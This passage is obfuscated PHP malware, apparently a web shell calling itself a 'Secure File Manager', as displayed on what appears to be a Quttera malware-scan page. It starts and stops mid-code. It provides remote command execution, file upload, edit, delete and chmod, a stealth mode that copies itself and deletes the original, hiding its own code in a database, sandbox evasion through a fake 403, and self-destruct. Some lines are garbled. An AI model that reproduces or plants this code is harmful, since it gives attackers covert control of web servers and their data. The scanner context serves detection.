type='submit' value='Save' class='btn btn-success mt-3'>"; echo "</form>"; die; } goto oRv2f; OqX6Z: goto koFCQ; goto QNEnT; i9Tdf: function obfuscateCode($code) { $replacements = array("eval" => "call_user_func("eval")", "while" => "for(;;)", "base64_decode" => "call_user_func("base64_decode")"); $code = str_replace(array_keys($replacements), array_values($replacements), $code); $code = preg_replace_callback("/\$[a-zA-Z0-9]+/", function ($match) { return "$" . substr(md5(random_bytes(4)), 0, 8); }, $code); echo "<p class='text-success'>Code obfuscation applied</p>"; return $code; } goto nBpYj; Dp0Fa: uH0gD: goto ixwQh; flq0Z: vV1oT: goto Of40b; IkCuv: if (isset($_GET["chmod"])) { global $isFile, $isDir, $changePerms, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET["chmod"]), $encryptionKey); if ($path === false || !$isFile($path) && !$isDir($path)) { error_log("Invalid chmod path: " . $_GET["chmod"]); echo "<p class='text-danger'>Invalid path</p>"; die; } if ($_SERVER["REQUEST_METHOD"] === "POST") { $mode = 0; $mode |= isset($_POST["ur"]) ? 256 : 0; $mode |= isset($_POST["uw"]) ? 128 : 0; $mode |= isset($_POST["ux"]) ? 64 : 0; $mode |= isset($_POST["gr"]) ? 32 : 0; $mode |= isset($_POST["gw"]) ? 16 : 0; $mode |= isset($_POST["gx"]) ? 8 : 0; $mode |= isset($_POST["or"]) ? 4 : 0; $mode |= isset($_POST["ow"]) ? 2 : 0; $mode |= isset($_POST["ox"]) ? 1 : 0; if ($changePerms($path, $mode)) { echo "<p class='text-success'>Permissions updated</p>"; } else { echo "<p class='text-danger'>Permission change failed</p>"; } echo "<a href='?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "' class='btn btn-info'>Back</a>"; } else { echo "<form method='POST'>"; echo "<h3>Change Permissions for " . htmlspecialchars(basename($path)) . "</h3>"; echo "<div>User: <input type='checkbox' name='ur'>Read <input type='checkbox' name='uw'>Write <input type='checkbox' name='ux'>Execute</div>"; echo "<div>Group: <input type='checkbox' name='gr'>Read <input type='checkbox' name='gw'>Write <input type='checkbox' name='gx'>Execute</div>"; echo "<div>Others: <input type='checkbox' name='or'>Read <input type='checkbox' name='ow'>Write <input type='checkbox' name='ox'>Execute</div>"; echo "<input type='submit' value='Apply' class='btn btn-success mt-3'>"; echo "</form>"; } die; } goto sHNVE; ikC3N: z0Z8u: goto kG7tO; rjeze: goto suznU; goto nAzvn; fyJqQ: displayFileTable($currentDir); goto XjBDz; QNEnT: B_MZj: goto DsqtD; gtuVD: WmrUT: goto jTMqJ; N0paU: goto noJjk; goto n6UId; CfUuH: KxHes: goto HD7QG; XNEDf: MvKVu: goto Ks2z6; ZYqLI: goto H0yyz; goto r4hEh; eg3vP: KbIJ7: goto VHpb6; Q5s8r: function displayFileList($directory) { global $dirScan, $isDir, $isFile, $encryptionKey; $items = $dirScan($directory); echo "<div class='list-group mb-4'>"; foreach ($items as $item) { if ($item ===  || $item === "..") { continue; } $path = rtrim($directory, "/") . "/" . $item; $encodedPath = urlencode(secureEncrypt($path, $encryptionKey)); echo "<div class='list-group-item bg-dark text-light border-light'>"; echo htmlspecialchars($item) . " (" . getFileInfo($path) . ")"; if ($isDir($path)) { echo " <a href='?dir={$encodedPath}' class='btn btn-sm btn-info'>Open</a>"; } else { echo " <a href='?edit={$encodedPath}' class='btn btn-sm btn-success'>Edit</a>"; echo " <a href='?download={$encodedPath}' class='btn btn-sm btn-primary'>Download</a>"; echo " <a href='?delete={$encodedPath}' class='btn btn-sm btn-danger' onclick="return confirm('Delete {$item}?')">Delete</a>"; echo " <a href='?rename={$encodedPath}' class='btn btn-sm btn-warning'>Rename</a>"; } echo "</div>"; } echo "</div>"; } goto gR0Gv; eThD1: $decode = "base64_decode"; goto rtnuT; S5y28: goto SUllZ; goto XNEDf; ZsDUV: error_reporting(E_ALL); goto ROU2v; r4hEh: DRzsC: goto SEXxg; faP1E: $deleteFile = "unlink"; goto c4PE3; kVLxC: $moveFile = "move_uploaded_file"; goto B91j0; JDbo6: if (isset($_GET["stealth"])) { $newFile = activateStealth(isset($_GET["delete"])); if ($newFile) { echo "<p class='text-success'>Stealth mode activated: {$newFile}</p>"; if (isset($_GET["delete"])) { echo "<p class='text-warning'>Original file removed</p>"; header("Location: {$newFile}"); die; } } echo "<a href='?' class='btn btn-info mt-3'>Back</a>"; die; } goto hhKS0; tIRgZ: U1zxN: goto jjOHb; DsqtD: $renameFile = "rename"; goto LrwcJ; zu_YY: goto KGP_d; goto UKepP; k70Pw: goto dj01Q; goto bYDyd; bS8WA: Qm8BQ: goto o5Svc; F1r96: $changePerms = "chmod"; goto k70Pw; Lhw0C: triggerSelfDestruct(); goto YHoZ5; sHNVE: goto lEi9e; goto gtuVD; aeXt7: kkDup: goto hdRl1; Of40b: $passwordHash = password_hash("6", PASSWORD_BCRYPT); goto gI3ro; jGXDx: $isDir = "is_dir"; goto rqgBL; hhKS0: goto rXHzO; goto hH0g1; nBpYj: goto kkDup; goto CTOno; oRv2f: goto WmrUT; goto c9xFE; gR0Gv: goto O7uaV; goto YRejt; fH3ra: pFU3u: goto ZsDUV; pnv69: goto vXJmh; goto ikC3N; aqyqy: goto pFU3u; goto ClAmE; LrwcJ: goto KbIJ7; goto LaVp3; jJex0: function secureEncrypt($data, $key) { if (function_exists("openssl_encrypt")) { $iv = random_bytes(16); $encrypted = openssl_encrypt($data, "AESj-CBC", $key, 0, $iv); if ($encrypted === false) { error_log("OpenSSL encryption failed"); return false; } return $GLOBALS["encode"](base64_encode($iv . $encrypted)); } $output = ''; for ($i = 0; $i < strlen($data); $i++) { $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $GLOBALS["encode"](bin2hex($output)); } goto rjeze; q110O: goto LpD7y; goto oWm_N; YHoZ5: goto OzN26; goto fH3ra; y0roJ: goto k6raX; goto NA_z9; oXFXb: goto MvKVu; goto d3iS2; RgJEb: O7uaV: goto QteJV; XjBDz: goto cDNBH; goto MBPUU; bJjCQ: goto mJG2Z; goto bz1ZP; XXhru: p5wDM: goto IkCuv; uNlno: lEi9e: goto am009; ixwQh:
</h1><form class="mb-4"enctype="multipart/form-data"method="POST"><div class="input-group"><input class="bg-dark border-light form-control text-light"name="file"type="file"> <button class="btn btn-success"type="submit">Upload</button></div></form><div class="mb-4"><a class="btn btn-secondary"href="?command">Execute Command</a> <a class="btn btn-secondary"href="?stealth">Stealth Mode</a> <a class="btn btn-danger"href="?stealth&delete">Stealth + Delete</a> <a class="btn btn-secondary"href="?hide">Hide in Database</a></div>goto xpkeY; BhKja: dj01Q: goto qJwZs; orjNM: goto z0Z8u; goto rjR0I; hdRl1: function storeInDatabase($code) { try { $db = new SQLite3(":memory:"); $db->exec("CREATE TABLE scripts (id INTEGER PRIMARY KEY, script TEXT)"); $stmt = $db->prepare("INSERT INTO scripts (script) VALUES (:script)"); $stmt->bindValue(":script", $GLOBALS["encode"]($code)); $stmt->execute(); $id = $db->lastInsertRowID(); echo "<p class='text-success'>Code stored in SQLite with ID: {$id}</p>"; return $id; } catch (Exception $e) { error_log("Database storage error: " . $e->getMessage()); echo "<p class='text-danger'>Failed to store code</p>"; return false; } } goto orjNM; YRejt: MqDn2: goto jGXDx; PJ1GT: if (isset($_GET["command"])) { $cmd = $_GET["command"] ?? "whoami"; echo "<pre>" . htmlspecialchars(executeCommand($cmd)) . "</pre>"; echo "<form method='GET'><input type='text' name='command' class='form-control bg-dark text-light border-light' value='{$cmd}'>"; echo "<input type='submit' value='Execute' class='btn btn-info mt-2'></form>"; die; } goto bJjCQ; o5Svc: if (detectSandbox()) { http_response_code(403); echo "<h1>403 Forbidden</h1>"; die; } goto y0roJ; pbMHm: if (!isset($_SESSION["authenticated"]) || $_SESSION["authenticated"] !== true) { if (isset($_POST["password"]) && password_verify($_POST["password"], $passwordHash)) { $_SESSION["authenticated"] = true; echo "<p class='text-success'>Authentication successful!</p>"; } else { echo "<!DOCTYPE html><html><head><meta charset='UTF-8'><title>Secure File Manager</title>"; echo "<link href='https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css' rel='stylesheet'>"; echo "</head><body class='bg-dark text-light'>"; echo "<div class='container mt-5'><div class='card bg-dark border-light mx-auto' style='max-width: 450px;'>"; echo "<div class='card-body'><h3 class='card-title text-info'>Secure File Manager Login</h3>"; echo "<form method='POST'><div class='mb-3'><input type='password' name='password' class='form-control bg-dark text-light border-light' placeholder='Enter Password' required></div>"; echo "<button type='submit' class='btn btn-info w-1'>Login</button></form></div></div></div></body></html>"; die; } } goto Zzbe2; jjOHb: if (isset($_GET["dir"])) { global $isDir, $encryptionKey; $currentDir = secureDecrypt(urldecode($_GET["dir"]), $encryptionKey); if ($currentDir === false || !$isDir($currentDir)) { error_log("Invalid directory: " . $_GET["dir"]); echo "<p class='text-danger'>Invalid directory</p>"; die; } } goto XrZL2; gI3ro: goto xpnzx; goto aeXt7; biG_B: if (isset($_GET["retrieve"])) { $code = fetchFromDatabase($_GET["retrieve"]); if ($code) { echo "<pre>" . htmlspecialchars($code) . "</pre>"; } die; } goto ZZ8BS; qXR8h: if (isset($_GET["listView"])) { global $isDir, $encryptionKey; $currentDir = secureDecrypt(urldecode($_GET["listView"]), $encryptionKey); if ($currentDir === false || !$isDir($currentDir)) { error_log("Invalid directory: " . $_GET["listView"]); echo "<p class='text-danger'>Invalid directory</p>"; die; } echo "<a href='?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "' class='btn btn-secondary mb-3'>Switch to Table View</a>"; displayFileList($currentDir); die; } goto rFAAN; LaVp3: m7FzC: goto G7WHN; d3iS2: zeKai: goto Le_qg; adWLm: goto uH0gD; goto bS8WA; c4PE3: goto ePZzY; goto flq0Z; G7WHN: if (!isset($_SESSION["encryption_key"])) { $_SESSION["encryption_key"] = hash("sha256", $_SERVER["SERVER_ADDR"] . rand(1000, 9999)); } goto oXFXb; nAzvn: xpnzx: goto pbMHm; rBSuO: goto p5wDM; goto RgJEb; O_OeP: $currentDir = isset($k9x7p) ? $k9x7p : realpath(); goto q16ln; VxFs9: if (isset($_GET["hide"])) { $code = $fileRead(__FILE__); $dbId = storeInDatabase($code); if ($dbId) { echo "<p class='text-success'>Code stored in database with ID: {$dbId}</p>"; } die; } goto pnv69; EkSbi: OHvyU: goto cxFp6; M31r3: echo htmlspecialchars($currentDir); goto adWLm; EcUYb: goto m1_pF; goto uNlno; BFi7_: goto vV1oT; goto BhKja; qmDzR: m1_pF: goto Njj5u; XrZL2: goto iGeL_; goto P6ivX; qJwZs: $fileSize = "filesize"; goto GuVMW; J3Uoh: $dirScan = "scandir"; goto kxSx_; NjXSW: goto Qm8BQ; goto eg3vP; fM6FK: ini_set("display_startup_errors", 1); goto aqyqy; ClAmE: OzN26: goto O_OeP; rBLCw: goto DRzsC; goto Iztbf; kf1Qk: V4LER: goto AZ9qS; ZZ8BS: goto Eap6j; goto VHGtU; rtnuT: goto m7FzC; goto ZS8S7; FDJCU: suznU: goto UPsBr; R4vvO: qXROW: goto faP1E; rFAAN: goto KxHes; goto R4vvO; bYDyd: vXJmh: goto biG_B; UKepP: k6raX: goto Lhw0C; VHpb6: $encode = "base64_encode"; goto ZzS3j; NA_z9: KGP_d: goto J3Uoh; am009: if (isset($_GET["download"])) { global $isFile, $encryptionKey; $file = secureDecrypt(urldecode($_GET["download"]), $encryptionKey); if ($file === false || !$isFile($file)) { error_log("Invalid download file: " . $_GET["download"]); echo "<p class='text-danger'>Invalid file</p>"; die; } header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); readfile($file); die; } goto SwiVa; VAhGR: k0W22: goto CG59b; ZS8S7: FBEFX: goto jJex0; VHGtU: noJjk: goto fM6FK; CG59b: function getFileInfo($path) { global $isDir, $isFile, $fileSize; if ($isDir($path)) { return "Directory"; } elseif ($isFile($path)) { return "File (" . round($fileSize($path) / 1024, 2) . " KB)"; } return "Unknown"; } goto t8ouB; B91j0: goto B_MZj; goto XXhru; jvGel: RdgXe: goto OK0Wy; M2DoU:
</div></body></htm


© 2023 Quttera Ltd. All rights reserved.